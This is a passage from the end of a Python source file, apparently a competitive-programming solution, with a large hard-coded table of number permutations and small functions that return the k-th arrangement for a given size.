,12,5,14,7,15,6,13,2,9,1,8),(10,3,11,4,12,5,14,7,15,8,1,9,2,13,6),(10,3,11,4,12,5,15,7,14,6,13,2,9,1,8),(10,3,11,4,12,5,15,8,1,9,2,13,6,14,7),(10,3,11,4,13,5,12,2,9,1,8,15,6,14,7),(10,3,11,4,13,5,12,2,9,1,8,15,7,14,6),(10,3,11,4,13,6,14,5,12,2,9,1,8,15,7),(10,3,11,4,13,6,14,7,15,5,12,2,9,1,8),(10,3,11,4,13,6,14,7,15,8,1,9,2,12,5),(10,3,11,4,13,6,15,7,14,5,12,2,9,1,8),(10,3,11,4,13,6,15,8,1,9,2,12,5,14,7),(10,3,11,4,14,6,13,5,12,2,9,1,8,15,7),(10,3,11,4,14,7,15,6,13,5,12,2,9,1,8),(10,3,11,4,14,7,15,8,1,9,2,12,5,13,6),(10,3,11,4,15,7,14,6,13,5,12,2,9,1,8),(10,3,11,4,15,8,1,9,2,12,5,13,6,14,7),(10,3,12,4,11,2,9,1,8,15,5,13,6,14,7),(10,3,12,4,11,2,9,1,8,15,6,13,5,14,7),(10,3,12,4,11,2,9,1,8,15,7,14,5,13,6),(10,3,12,4,11,2,9,1,8,15,7,14,6,13,5),(10,3,12,5,13,4,11,2,9,1,8,15,6,14,7),(10,3,12,5,13,4,11,2,9,1,8,15,7,14,6),(10,3,12,5,13,6,14,4,11,2,9,1,8,15,7),(10,3,12,5,13,6,14,7,15,4,11,2,9,1,8),(10,
3,12,5,13,6,14,7,15,8,1,9,2,11,4),(10,3,12,5,13,6,15,7,14,4,11,2,9,1,8),(10,3,12,5,13,6,15,8,1,9,2,11,4,14,7),(10,3,12,5,14,6,13,4,11,2,9,1,8,15,7),(10,3,12,5,14,7,15,6,13,4,11,2,9,1,8),(10,3,12,5,14,7,15,8,1,9,2,11,4,13,6),(10,3,12,5,15,7,14,6,13,4,11,2,9,1,8),(10,3,12,5,15,8,1,9,2,11,4,13,6,14,7),(10,3,13,5,12,4,11,2,9,1,8,15,6,14,7),(10,3,13,5,12,4,11,2,9,1,8,15,7,14,6),(10,3,13,6,14,5,12,4,11,2,9,1,8,15,7),(10,3,13,6,14,7,15,5,12,4,11,2,9,1,8),(10,3,13,6,14,7,15,8,1,9,2,11,4,12,5),(10,3,13,6,15,7,14,5,12,4,11,2,9,1,8),(10,3,13,6,15,8,1,9,2,11,4,12,5,14,7),(10,3,14,6,13,5,12,4,11,2,9,1,8,15,7),(10,3,14,7,15,6,13,5,12,4,11,2,9,1,8),(10,3,14,7,15,8,1,9,2,11,4,12,5,13,6),(10,3,15,7,14,6,13,5,12,4,11,2,9,1,8),(10,3,15,8,1,9,2,11,4,12,5,13,6,14,7),(11,3,10,2,9,1,8,15,4,12,5,13,6,14,7),(11,3,10,2,9,1,8,15,5,12,4,13,6,14,7),(11,3,10,2,9,1,8,15,6,13,4,12,5,14,7),(11,3,10,2,9,1,8,15,6,13,5,12,4,14,7),(11,3,10,2,9,1,8,15,7,14,4,12,5,13,6),(11,3,10,2,9,1,8,15,7,14,5,12,4,13,6),(11,3,10,2,9,1,8,15,7,14,6,13,4,12,5),(11,3,10,2,9,1,8,15,7,14,6,13,5,12,4),(11,4,12,3,10,2,9,1,8,15,5,13,6,14,7),(11,4,12,3,10,2,9,1,8,15,6,13,5,14,7),(11,4,12,3,10,2,9,1,8,15,7,14,5,13,6),(11,4,12,3,10,2,9,1,8,15,7,14,6,13,5),(11,4,12,5,13,3,10,2,9,1,8,15,6,14,7),(11,4,12,5,13,3,10,2,9,1,8,15,7,14,6),(11,4,12,5,13,6,14,3,10,2,9,1,8,15,7),(11,4,12,5,13,6,14,7,15,3,10,2,9,1,8),(11,4,12,5,13,6,14,7,15,8,1,9,2,10,3),(11,4,12,5,13,6,15,7,14,3,10,2,9,1,8),(11,4,12,5,13,6,15,8,1,9,2,10,3,14,7),(11,4,12,5,14,6,13,3,10,2,9,1,8,15,7),(11,4,12,5,14,7,15,6,13,3,10,2,9,1,8),(11,4,12,5,14,7,15,8,1,9,2,10,3,13,6),(11,4,12,5,15,7,14,6,13,3,10,2,9,1,8),(11,4,12,5,15,8,1,9,2,10,3,13,6,14,7),(11,4,13,5,12,3,10,2,9,1,8,15,6,14,7),(11,4,13,5,12,3,10,2,9,1,8,15,7,14,6),(11,4,13,6,14,5,12,3,10,2,9,1,8,15,7),(11,4,13,6,14,7,15,5,12,3,10,2,9,1,8),(11,4,13,6,14,7,15,8,1,9,2,10,3,12,5),(11,4,13,6,15,7,14,5,12,3,10,2,9,1,8),(11,4,13,6,15,8,1,9,2,10,3,12,5,14,7),(11,4,14,6,13,5,12,3,10,2,9,1,8,15,7),(11,4,14,7,15,6,13,5,12,3,10
,2,9,1,8),(11,4,14,7,15,8,1,9,2,10,3,12,5,13,6),(11,4,15,7,14,6,13,5,12,3,10,2,9,1,8),(11,4,15,8,1,9,2,10,3,12,5,13,6,14,7),(12,4,11,3,10,2,9,1,8,15,5,13,6,14,7),(12,4,11,3,10,2,9,1,8,15,6,13,5,14,7),(12,4,11,3,10,2,9,1,8,15,7,14,5,13,6),(12,4,11,3,10,2,9,1,8,15,7,14,6,13,5),(12,5,13,4,11,3,10,2,9,1,8,15,6,14,7),(12,5,13,4,11,3,10,2,9,1,8,15,7,14,6),(12,5,13,6,14,4,11,3,10,2,9,1,8,15,7),(12,5,13,6,14,7,15,4,11,3,10,2,9,1,8),(12,5,13,6,14,7,15,8,1,9,2,10,3,11,4),(12,5,13,6,15,7,14,4,11,3,10,2,9,1,8),(12,5,13,6,15,8,1,9,2,10,3,11,4,14,7),(12,5,14,6,13,4,11,3,10,2,9,1,8,15,7),(12,5,14,7,15,6,13,4,11,3,10,2,9,1,8),(12,5,14,7,15,8,1,9,2,10,3,11,4,13,6),(12,5,15,7,14,6,13,4,11,3,10,2,9,1,8),(12,5,15,8,1,9,2,10,3,11,4,13,6,14,7),(13,5,12,4,11,3,10,2,9,1,8,15,6,14,7),(13,5,12,4,11,3,10,2,9,1,8,15,7,14,6),(13,6,14,5,12,4,11,3,10,2,9,1,8,15,7),(13,6,14,7,15,5,12,4,11,3,10,2,9,1,8),(13,6,14,7,15,8,1,9,2,10,3,11,4,12,5),(13,6,15,7,14,5,12,4,11,3,10,2,9,1,8),(13,6,15,8,1,9,2,10,3,11,4,12,5,14,7),(14,6,13,5,12,4,11,3,10,2,9,1,8,15,7),(14,7,15,6,13,5,12,4,11,3,10,2,9,1,8),(14,7,15,8,1,9,2,10,3,11,4,12,5,13,6),(15,7,14,6,13,5,12,4,11,3,10,2,9,1,8),(15,8,1,9,2,10,3,11,4,12,5,13,6,14,7)]
}
if n not in d:
return -1
if k > len(d[n]):
return -1
return d[n][k - 1]
def getArray(n, k):
    """Return the k-th precomputed arrangement for size n.

    Dispatches to the odd-size or even-size lookup table based on the
    parity of n. The delegates return -1 when n or k is out of range,
    and that value is passed through unchanged.
    """
    # Even sizes and odd sizes live in separate precomputed tables.
    handler = getArraysFastEven if n % 2 == 0 else getArraysFastOdd
    return handler(n, k)
# for _ in xrange(input()):
# n, k = map(int, raw_input().split())
# val = getArray(n, k)
# if val in [-1, 1]:
# print val
# else:
# print " ".join(str(i) for i in val) | [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.